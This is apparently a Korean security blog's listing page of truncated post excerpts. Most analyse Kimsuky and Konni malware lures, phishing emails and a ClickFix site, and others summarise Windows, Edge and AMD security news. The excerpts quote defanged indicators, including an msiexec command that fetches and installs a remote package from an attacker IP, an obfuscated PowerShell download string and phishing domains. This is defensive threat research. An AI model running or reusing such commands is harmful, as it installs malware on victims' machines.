브레이브 소프트웨어는 암호화폐 AI, 보상 및 기타 수익 창출 중심 기능을 제거 불필요한 기능을 배제한 최소주의 스타일의 유료 브라우저 오리진(Origin)을 정식 출시한다고 발표브레이브 브라우저 개발사는 브레이브 오리진이 회사의 선택적 수익 창출 서비스 및 통합 기능을 제외하고 더욱 간결하고 개인정보 보호에 중점을 둔 브라우저를 원하는 사용자를 위해 설계되었다고 밝혔습니다.오늘 브레이브는 브레이브의 기본 제공 기능을 모두 필요로 하지 않지만 브레이브만이 제공하는 프라이버시는 여전히 원하는 사용자를 위한 유료 브라우저 버전인 브레이브 오리진(Brave Origin) 의 출시를 발표브레이브에 따르면 브라우저는 브레이브 리워드(Brave Rewards), 브레이브 월렛(Brave Wallet), 브레이브 V..
오늘은 북한 해킹 조직 김수키(Kimsuky) 에서 만든 악성코드인 (대외보안)통일부_중동상황관련_정책간담회_기획안.pdf에 대해서 글을 적어 보겠습니다파일명:(대외보안)통일부_중동상황관련_정책간담회_기획안.pdf.lnk사이즈:1 MBMD5:232affa807a618e98959d858f064a434SHA-1:76314081b9bf6660fda31bc08fa2237d43db3600SHA-256:e291ee630a58c405f86ca83d9364bfc3dbf13aecff9000cca4f2602158dac845입니다.일단 반복 키 기반 조건부 감산 난독화 부분으로 변수명 $VIUSBvejbawf난독화 키 문자열 KKswf&3H&오프셋:+103방식:반복 키 기반 조건부 감산조건 A (pw_num >= 암호문):..
오늘은 마이크로소프트 윈도우 디펜더(Windows Defender)를 무력화하는 제로데이 공격 코드(익스플로잇) 간단하게 분석을 해보는 시간을 가져 보겠습니다. 해당 익스플로잇은 지금 악용 중이라 난리도 아냐~일단 해당 부분을 알고 가기 전에 배경부터 설명해당 취약점은 나이트메어 이클립스 라는 가명의 보안 연구가가 2026년 4~5월 사이 윈도우 보안 취약점(YellowKey, UnDefend 등) 6개와 실제 공격 코드(익스플로잇)보안 연구가가 정상적인 절차로 취약점을 제보했으나 MS 측이 소통 거부, 보상금 지급 거절, 계정 차단으로 대응하자 이에 대한 보복으로 공개유출된 코드가 실제 해킹에 악용되자 MS는 법적 대응을 예고 MS의 불통이 원인이라는 보안 업계의 거센 비판에 부딪혀 결국 고발 방침을 ..
오늘은 코레일(Korail)직원을 노린 것으로 추정되는 피싱 메일 분석을 해보겠습니다.일단 단순하게??@korail(.)com이 본인의 이메일 주소인지 확인해 주십시오계정 ID를 확인하세요???@korail(.)com계속 사용하시고 서비스 중단을 방지하려면 소유권을 확인해 주십시오 라고 된 부분은 이미지 파일로 구성이 되어져 있습니다.이메일 헤더 분석1.실제 발신 계정표시 이름은 KORAIL이지만 인증된 발신자는 samyangfoods(.)store 도메인 계정KORAIL 공식 아님2.발신 서버AWS EC2 서버에서 발송기업 메일 발송 서버일 수도 있지만 피싱 발송 인프라로도 자주 악용3.중간 경유 IP 의심85(.)121(.)215(.)235 가 외부 발신,경유 IP KORAIL 내부 정상 발송 경로 ..
오늘은 2019년 6월 2일~현재 방영 중인 KBS 일요진단에서 나온 것처럼 속이는 [KBS 일요진단]질문지 입니다.일단은 해당 악성코드는 2023년 작품이기 때문에 매크로로 작성된 것을 확인할 수가 있습니다. 당시에는 매크로가 유행 이서파일명:[KBS 일요진단]질문지.docx사이즈:1 MBMD5:55a46a2415d18093abcd59a0bf33d0a9SHA-1:791861d050f82471eb5fd32d427ff6d9a2b30854SHA-256:a2e6e833947a1d5c526c0c2d6943e35bad9cbe22b52a6f7013ab8c1de0aa2d31내용Microsoft Office콘텐츠를 불러올 수 없습니다.호환성문제로 콘텐츠를 올바르게 불러올 수 없습니다.문제를 해결하시려면, 아래의 조치들..
오늘은 북한 해킹 집단 김수키(Kimsuky) 에서 한국 바이낸스(Binance) 사용자를 노린 것을 추정되는 악성코드인 BN_FIU_2026.chm 에 대해서 알아보겠습니다.파일명:BN_FIU_2026.chm사이즈:1 MBMD5:eb823d5448bc3d39e353a5fcf0feb91fSHA-1:bd84642d51d473389ac25e724c1b1839aa9c92dcSHA-256:bc0fe921f3dae89df12adbd034ff58b875223dd3c3119aba6eaa023ad818d653해당 악성코드는 chm 파일로 위장하고 있으며 즉 도움말 파일로 위장하는 것이 특징이며 해당 악성코드 언제나 Base64 를 이용을 하는 것은 똑같음윈도우 도움말처럼 위장하는 것이 특징분석1.PowerShell 명..
반도체 부품 제조사 중 몇 안 되는 선두권 기업x86 기반 소비자용 CPU 제조업과 외장 GPU 제조업에서 각각 인텔, 엔비디아와 경쟁하는 업체인 AMD에서 보안 권고문 AMD-SB-4017을 공개했습니다.AMD Athlon 3000시리즈부터 AMD Ryzen 9000, AMD Ryzen AI 300시리즈에 이르기까지 광범위한 제품이 대상이며, 메인보드 및 PC 제조사에서 제공하는 BIOS 업데이트를 적용할 것을 권장하고 있다.이번에 공개된 취약점은 CVE 번호 기준으로 총 10건이다. CVSS 4.0 기준 점수에 따른 심각도 내용은 High 2건, Medium 6건, Low 1건이며, 그중 가장 심각도가 높은 2건은 모두 AMD Secure Processor(ASP)와 관련된 것ASP의 액세스 제어가 ..
오늘은 북쪽 동네 북한 아니 어떤 장관님 말씀으로 조선이라고 부려야 하는? 아니 북한에서 오산 공군기지를 공격한 것으로 추측되는 김수키(Kimsuky) 에서 만든 악성코드-Update_251001 ACM Sakesan Kantha.pdf.lnk 에 대해서 알아보겠습니다.파일명:Update_251001 ACM Sakesan Kantha.pdf.lnk사이즈:1 MBMD5:b516ec6c6b37618ad65080a063270ea4SHA-1:b9f25b21eccbcca77adb11a0e613d4eca4e38442SHA-256:22180919f562fb9f6e50d7f20b2eb3f94eb009c212b74b45cf77659fe8274d5b일단 악성코드는 당연히 파워셀로 구성이 되어져 있는 악성코드이며 Power..
구글이 크로미움(Chromium)의 미해결 취약점에 대한 세부 정보를 실수로 유출해당 취약점 때문에 브라우저가 닫혀 있어도 자바스크립트가 백그라운드에서 계속 실행되어 기기에서 원격 코드 실행이 가능크로미움 이슈 트래커(Chromium Issue Tracker)의 게시글에 따르면 해당 결함은 보안 연구원 라이라 레베인(Lyra Rebane)이 보고했으며 2022년 12월에 유효한 것으로 인정공격자는 해당 문제를 악용해 다운로드 작업과 같이 절대 종료되지 않는 서비스 워커(Service Worker)를 포함한 악성 웹페이지를 생성할 수 있습니다.레바네는 이를 통해 공격자가 방문자의 기기에서 자바스크립트 코드를 실행할 수 있다고 설명레바네는 원본 버그 보고서를 통해 수만 건의 페이지뷰를 확보해 봇넷을 구축하는..
마이크로소프트는 제로데이 공격에 악용된 두 가지 WIndows Defender 취약점에 대한 보안 패치 배포를 시작첫 번째 취약점(CVE-2026-41091)은 마이크로소프트 맬웨어 방지 엔진(Microsoft Malware Protection Engine) 1.1.26030.3008 및 이전 버전에 영향을 미치는 권한 상승 보안 결함해당 엔진은 마이크로소프트 안티바이러스 및 안티스파이웨어 소프트웨어에 스캔, 탐지, 제거 기능을 제공해당 결함은 파일 액세스 전 부적절한 링크 해결(링크 추적) 취약점에서 비롯된 것으로 공격자가 SYSTEM 권한을 획득할 수 있게 합니다.두 번째 취약점(CVE-2026-45498)은 Microsoft Defender 맬웨어 방지 플랫폼 4.18.26030.3011 및 이전 ..
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 2026년 방위산업기술개발사업 최종평가위원회 위원 위촉 안내.pdf.lnk 에 대해서 알아보겠습니다. 해당 악성코드는 2026년 방위산업기술개발사업 최종평가위원회 위원 위촉 안내 으로 돼 있으면 일단 방위산업기술개방 부분을 노린 것이 아닌지 조심스럽게 생각을 합니다.파일명: 2026년 방위산업기술개발사업 최종평가위원회 위원 위촉 안내.pdf.lnk사이즈:2 MBMD5:c49289228ea08a4e7d5a056cacf8adbdSHA-1:a9f24d4fec3585b729c85355a9dbee8b2cffb721SHA-256:5681ef6d074421cb4dbd3d1389b2d83a4920ee84ed8fd198a739d184c2bc4c0c악성코..
오늘은 노드 VPN IP 우회를 해주는 NordVPN 글을 적어 보겠습니다. NordVPN은 유료 개인용 가상사설망 서버이며 윈도우, MacOS, 리눅스를 지원하고 있으며 스마트폰에서는 안드로이드와 iOS 를 지원을 하고 있습니다. 그리고 안드로이드 TV에서 사용할 수가 있습니다.노드 VPN의 본사는 데이터 보존법의 의무가 없으며 여기서 제일 중요한 것은 5개의 눈(Five Eyes), 14개의 눈 (Fourteen Eyes) 해당 동맹에서 안전하며 파나마에 있습니다.그리고 2019년 10월 29일 노드 VPN은 노-로그 감사 보고서를 공개 보안 컨설팅 회사와 파트너십을 맺고 램 서버로 인프라 교체, 버그 바운티 프로그램 그리고 2022년 6월에서는 인도는 VPN 회사와 ISP에게 5년 이상 고객 데이터..
오늘도 북한 김수키(Kimsuky) 에서 만든 악성코드 중 하나인 5월 신고 납부기한 통지서.pdf.lnk 에 대해서 알아보겠습니다. 해당 악성코드는 5월 신고 납부기한 통지서.pdf.lnk,국세 고지서.pdf.lnk 이름으로 유포를 하는 악성코드입니다.MD5:9fc126288c15dc835b1e62baf80f95baSHA-1:b492a503cb4c8360f81adee8f1e07066beb030d1SHA-256:ab96a72cb227b8b10a2f147ecf211e2094483f028fb57b380ec5f391d9e164e9뭐~일단 해당 악성코드에 포함된 것은 PowerShell 사용을 해서 Base64로 인코딩된 부분을 통해서 link24(.)kr 으로 이동을 하게 되어져 있으며 얼마나 악성코드를 많이..
오늘은 부킹닷컴 으로 위장하는 클릭픽스 공격 사이트 분석을 하는 시간을 가져 보겠습니다. 일단 해당 클릭픽스(ClickFix)방법을 통해서 사용자 컴퓨터를 노리는 방식 입니다.유포 사이트propertypanelreservations(.)com일단 해당 사이트에 접속을 하면 먼저 언제나 클릭픽스(ClickFix) 처럼 윈도우+R 를 실행을 하고 나서 복사 붙여 넣기를 하라고 하면 이때부터 사용자는 악성코드를 직접 실행하게 됩니다.msIeXec.ExE -PᵃcKᵃGE hxxp://147(.)45(.)45(.)245/genius /QmsIeXec.ExE:Windows Installer 실행 파일이며 대소문자 섞기는 탐지 우회 목적 가능-PᵃcKᵃGE /package 옵션을 가장한 형태로 보임.ᵃ는 일반 ASC..
오늘도 Kimsuky(김수키)에서 만든 악성코드-하나은행_웨이브릿지 전략적 협업 제안서.lnk 에 대해 글을 적어보겠습니다.일단 해당 악성코드는 하나은행_웨이브릿지 전략적 협업 제안서로 위장하는 것이 특징입니다.파일명: 하나은행_웨이브릿지 전략적 협업 제안서.lnk사이즈:1 MBMD5:3561136674ef90bbe9e64245d42b9ef8SHA-1:78ce7dbf3616e49efba69249121a985d0bd32073SHA-256:45387425929d60b59f8d06c1c07f3e399eac8c5289f234bb5a26912509266fd0악성코드 분석이번에는 HEX로 구성이 되어져 있는 것을 볼 수가 있으며 해당 부분은 CyberChef 로 풀거나 notepad++로 쉽게 디코딩 가능합니다.1..
마이크로소프트는 이전에 이를 설계상 의도된 기능이라고 밝혔으나 마이크로소프트 엣지 웹 브라우저를 업데이트하여 시작 시 저장된 비밀번호를 평문으로 프로세스 메모리에 로딩하지 않도록 조치할 예정해당 문제는 5월 4일 보안 연구원 톰 요란 손스테비세터 뢰닝(Tom Jøran Sønstebyseter Rønning)에 의해 공개되었으며 그는 엣지 내장 비밀번호 관리자에 저장된 모든 인증 정보가 실행 시 복호화되어 사용하지 않을 때도 메모리에 유지된다는 사실을 입증뢰닝은 또한 관리자 권한을 가진 공격자가 다른 사용자의 마이크로소프트 엣지 프로세스에서 비밀번호를 추출할 수 있게 해주는 개념 증명(PoC) 도구를 공개(관리자 권한이 없는 경우 PoC는 같은 사용자가 실행한 엣지 프로세스에만 접근할 수 있다.)그는 또..
오늘은 북한 해킹 단체 김수키(Kimsuky) 에서 만든 악성코드인 노X정님.jse 에 대해서 글을 적어보겠습니다.PebbleDash 플랫폼을 기반으로 제작된 악성코드이며 해당 부분은 김수키(Kimsuky)의 자매인 Lazarus Group이 사용했던 도구입니다.2021년 체적으로 활용해 오고 있습니다.Kimsuky는 VSCode 터널링,Cloudflare Quick Tunnels, DWAgent, 대규모 언어 모델(LLM), Rust 프로그래밍 언어 등 다양한 도구를 사용해서 공격에 사용하고 있으며 주로 한국의 공공 및 민간 부문을 표적이며 특히 PebbleDash 클러스터는 전 세계 의료, 군사와 방위 산업 분야에 관심을 보였습니다. PebbleDash 클러스터는 지난 몇 년간 브라질과 한국의 방위 ..
마이크로소프트에서 제공하는 운영체제인 윈도우 11,윈도우 10 에 대한 각각 보안 업데이트가 진행이 되었습니다.일단 윈도우 10 KB5087544 변경점Windows 10 KB5087544마이크로소프트는 더는 Windows 10용 새로운 기능을 출시하지 않으며 KB5087544 업데이트에는 주로 보안 업데이트와 버그 수정 사항이 포함되어 있습니다.마이크로소프트는 120개의 취약점을 수정KB5087544의 전체 수정 사항 목록은 다음과 같습니다:원격 데스크톱 보안 경고 (알려진 문제) 수정된 디스플레이 배율 설정이 서로 다른 다중 모니터 구성에서 원격 데스크톱 연결 보안 경고 대화 상자가 올바르게 표시되지 않을 수 있는 문제가 수정해당 문제는 2026년 4월 14일에 출시된 Windows 보안 업데이트(K..
오늘은 한전 전기 요금 청구서로 위장한 피싱 메일 분석을 해보겠습니다. 해당 피싱 메일은 일단 해당 피싱 메일은 경기도 서남부권과 인천광역시 지역권의 도시가스, 민자발전, 집단에너지 등의 사업을 하는 곳을 노렸습니다.이메일 내용을 보면 한국전력 전기요금 청구서로 돼 있으며 billkorea(빌코리아) 에서 발신한 것처럼 돼 있지만, 해당 업체 하고는 전혀 상관없는 곳입니다.발신자 표시명: 빌코리아->한국 업체처럼 보이도록 위장실제 발신 주소:billkorea@lknight(.)info->billkorea와 상관 없는 부분발신 도메인:lknight.info->업무,청구서 발송 도메인 아님발신 IP:173(.)212(.)214(.)14->독일(DE) 소재로 표시됨수신자:????@samchully(.)co(...
오늘은 북한 해킹 단체 코니(Konni)에서 만든 악성코드인 0a6934a3_.lnk 에 대해 분석을 해보겠습니다.파일명:0a6934a3_.lnk사이즈: 1 MBMD5: 7b4fc4d03238d20938a8c1a763028237SHA-1: 5fd6f20214f3fd1e424e453d2a5e5d78775b130eSHA-256: 6afdbaf73028607b49f725467bf5dce4bb9f8c7b7095e43f09ecfce94b450fd4악성코드 분석1.LNK 내부의 오프셋 0x18A8~0xC1A71 바이트를 읽고 XOR 0x7F로 복호화LNK 내부에 숨겨진 실행용 페이로드2.파일 내부에서 페이로드 읽기0x000018A8:6,312:LNK 내부 페이로드 시작 오프셋0x000C1A71:793,201:읽어올..
인스타그램은 2026년 5월 8일부로 다이렉트 메시지(DM)에서 종단 간 암호화 기능을 제거했습니다.이번 변경으로 메타는 인스타그램 DM의 내용을 열람하고 처리할 수 있게 되었으며 2019년부터 제공되던 선택적 암호화 기능은 종료되었습니 다.인스타그램은 올해 초 이런 변경 사항을 발표했으며 5월 8일부터 해당 조치가 시행되었습니다.인스타그램의 암호화 메시징은 기본적으로 활성화된 적이 없습니다.사용자는 개별적으로 암호화 채팅을 선택해야 했습니다.이제 모든 사용자에 대해 해당 옵션이 제거되었습니다.인스타그램 DM 암호화 제거가 사용자에게 의미종단간 암호화는 발신자와 수신자만이 메시지 내용에 접근할 수 있도록 보장하여 플랫폼 자체는 이를 읽을 수 없게 합니다.암호화가 없으면 메타는 자사 서버에 저장된 메시지에..
구글 크롬 브라우저에서 4GB 용량의 제미니 나노 AI 모델을 몰래 다운로드 중입니다. 구글 크롬은 사용자의 동의 없이 약 4GB 규모의 제미니 나노(Gemini Nano) AI 모델 가중치를 사용자 기기에 몰래 다운로드해 왔으며 파일이 삭제되면 자동으로 다시 다운로드 합니다. 이러한 현상은 윈도우 11, 애플 실리콘,우분투 시스템에서 확인되었으며 사용자 보고에 따르면 약 1년 동안 지속하여 온 것으로 나타났습니다.해당 파일들은 OptGuideOnDeviceModel 이라는 폴더에 저장윈도우 11의 경우 경로는 %LOCALAPPDATA%\Google\Chrome\User Data\OptGuideOnDeviceModel 입니다.크롬의 4GB 제미니 나노 다운로드 용도해당 4GB 폴더는 크롬의 주요 AI 기..
오늘은 북한 해킹 조직 김수키(Kimsuky) 에서 만든 피싱 사이트 에 대해 한번 오래간만에 분석을 해보겠습니다.일단 해당 피싱 사이트는 네이버 로그인 화면으로 돼 있는 것이 특징입니다. 일단 예전같이 쓸데없게 만들어 놓은 것이 아니고 진짜와 비슷하게 구성이 돼 있는 것이 특징입니다.특징은 인스타그램 DM 으로 네이버 계정 탈취 목적 김수키(Kimsuky)에서 만든 네이버 피싱 사이트 입니다.hxxps://ncafe-article(.)media입니다.웹 소스를 보면 네이버 카페 : 너무 억울한 일을 당해 참다가... 이런 식으로 돼 있는데 해당 부분은 인스타그램 DM 으로 무작위로 아무에게나 뿌리는 것과 비슷합니다. 오래전부터 해 오던 수법여기서 아이디 비밀번호를 입력하면 다음과 같은 경로로 전송되는 ..
오늘도 즐겁게 북한 해킹 단체 김수키(Kimsuky) 만든 악성코드-Condor_API-1.chm 에 대해서 글을 적어보겠습니다. 일단 해당 악성코드는 Condor Casino API에 관해서 chm 파일인 것처럼 속인 악성코드입니다.Condor Casino API는 카지노 플랫폼이 슬롯, 라이브 카지노, 기타 게임 콘텐츠를 외부 게임 제공사와 연동할 수 있도록 제공되는 API자체 카지노 사이트나 플랫폼에서 여러 게임 제공사의 게임을 실행하고 사용자 잔액, 베팅, 당첨, 보너스, 자유 스핀 등을 API와 콜백 방식으로 처리할 수 있게 해주는 통합 시스템입니다.사용자가 게임 실행 요청운영사 서버가 Condor API의 Launch API 호출Condor API가 게임 세션 URL 반환유저가 해당 URL로 ..
오늘은 코레일(Korail) 4월 급여 명세서로 위장한 피싱 메일 분석을 해보겠습니다. 일단 이메일을 열며 다음과 같은 메일 화면을 볼 수가 있습니다.부착: 1파일 (322.09 KB) AM Korail, 2026년 4월 급여명세서 파일.pdfkeep index 정말 수고 많으셨고, 진심으로 축하드립니다.Payroll Dept.Korail Co., Ltd.헤더 분석표시 발신자:korail Co., Ltd->정상적인 코레일 처럼 보이게 위장실제 From 주소:Hr_account2656@hilywil(.)com->korail.com이 아닌 것을 그냥 눈에 쉽게 확인 가능 메일 주소만 보면 쉽게 확인 가능수신자:w????@korail(.)com제목 4월 급여 지급 안내 Korail 임직원 대상 급여 피싱발신 ..
오늘은 Microsoft Edge(마이크로소프트 엣지)실행 시 저장된 모든 비밀번호를 암호화되지 않은 상태로 프로세스 메모리에 저장 문제에 대해서 알아보겠습니다.한 보안 연구원이 마이크로소프트 엣지(Microsoft Edge)가 브라우저가 실행되는 순간 저장된 모든 비밀번호를 프로세스 메모리에서 복호화하여, 사용자가 해당 사이트를 방문했는지와 관계없이 평문 상태로 보관한다는 사실을 발견했습니다.4월 29일 BigBiteOfTech에서 PaloAltoNtwks Norway가 공개한 해당 발견은 연구원 @L1v1ng0ffTh3L4N이 크로미움 기반 주요 브라우저들의 자격 증명 메모리 처리 방식을 체계적으로 테스트하던 중 밝혀낸 것입니다. 일단 여기서 한국의 네이버에서 공개되는 네이버 웨일은 개인적으로 테스트..
2026년 4월 KB5083769 보안 업데이트 로 인해 Windows 11 24H2 및 25H2를 실행하는 시스템에서 여러 공급업체의 타사 백업 애플리케이션이 정상적으로 작동하지 않는 문제 발생Microsoft MVP인 Susan Bradley가 처음 발견한 사용자 보고에 따르면 해당 문제는 VSS(볼륨 섀도 복사본 서비스) 스냅샷을 사용하는 소프트웨어에 영향을 미치며 VSS 서비스 시간 초과 때문에 오류가 발생Microsoft VSS는 Windows Server 2003에 도입되었으며 운영 체제, 백업 소프트웨어 및 비즈니스 애플리케이션(예: SQL Server 및 Exchange)이 보다 효과적으로 연동하도록 도와줍니다.또한, VSS는 Windows Server Backup, System Cente..
오늘은 정체를 알 수가 없는 APT에서 만든 악성코드인 NovaCX_Agency_Updated_2026047_091100_version_1_8 에 대해서 알아보겠습니다.먼저 NovaX는 디지털 경험 솔루션, 암호화폐 거래, 정찰 드론, 국제 투자 행사 등 같은 이름을 공유하는 다양한 산업 분야의 브랜드 및 기술 서비스를 제공하는 업체로 보입니다.파일명:NovaCX_Agency_Updated_2026047_091100_version_1_8.docx.lnk사이즈:1 MBMD5:10b40185106eb3760cb71c46117aa0bfSHA-1:c2d2332b2bf0fecbea7da05792a61da979499b21SHA-256:6e36060854006f9ed029ab7547f4478f0486ba5256ce9..
오늘은 북한 해킹 단체인 김수키(Kimsuky)인 install.bat 에 대해 알아보겠습니다. 해당 악성코드는 파일을 다운로드 및 실행을 하는 구조로 되어져 있으며 이력서로 속이는 것이 특징입니다.파일명:install.bat사이즈:1 MBMD5:77a7767d8f873741d4a93163178c3083SHA-1:f7ec2f4d725dff301f02dd9bf74eb19e0f0f2a52SHA-256:aeb2cbf7f7031467d99c6fa29318bd51642ed5ff46b20458baab8fb2ef671f28분석1.PowerShell 명령 일부러 숨김powe7rshellht7xps://실행할 때는 7 을 제거하는 방식을 사용을 하고 있습니다. 즉 다음 파워셀 명령어를 실행합니다.hxxps://racsw..
모질라 재단에서 배포를 하는 브라우저인 파이어폭스에서 일단 영국 내 iOS용 Shake to Summarise AI 기능 추가(안드로이드 지원도 예정) 이라고 합니다.모질라는 영국 내 iOS용 파이어폭스에 Shake to Summarise 기능을 도입해당 기능을 통해 사용자는 아이폰을 흔들거나 브라우저 내 특정 컨트롤을 탭 하여 AI를 활용해 웹 페이지의 요약문을 생성할 수 있습니다.안드로이드 기기 지원은 2026년 하반기에 제공될 예정이러한 요약문은 콘텐츠 유형에 맞춰 제공되는데 예시를 들어서 요리법에는 단계별 설명, 스포츠 페이지에는 점수와 통계, 뉴스 기사에는 본문의 핵심 내용이 강조되어 표시기기 내 처리 대 클라우드 처리iOS 26 이상을 실행하는 iPhone 15 Pro 모델 및 이후 기기의 경..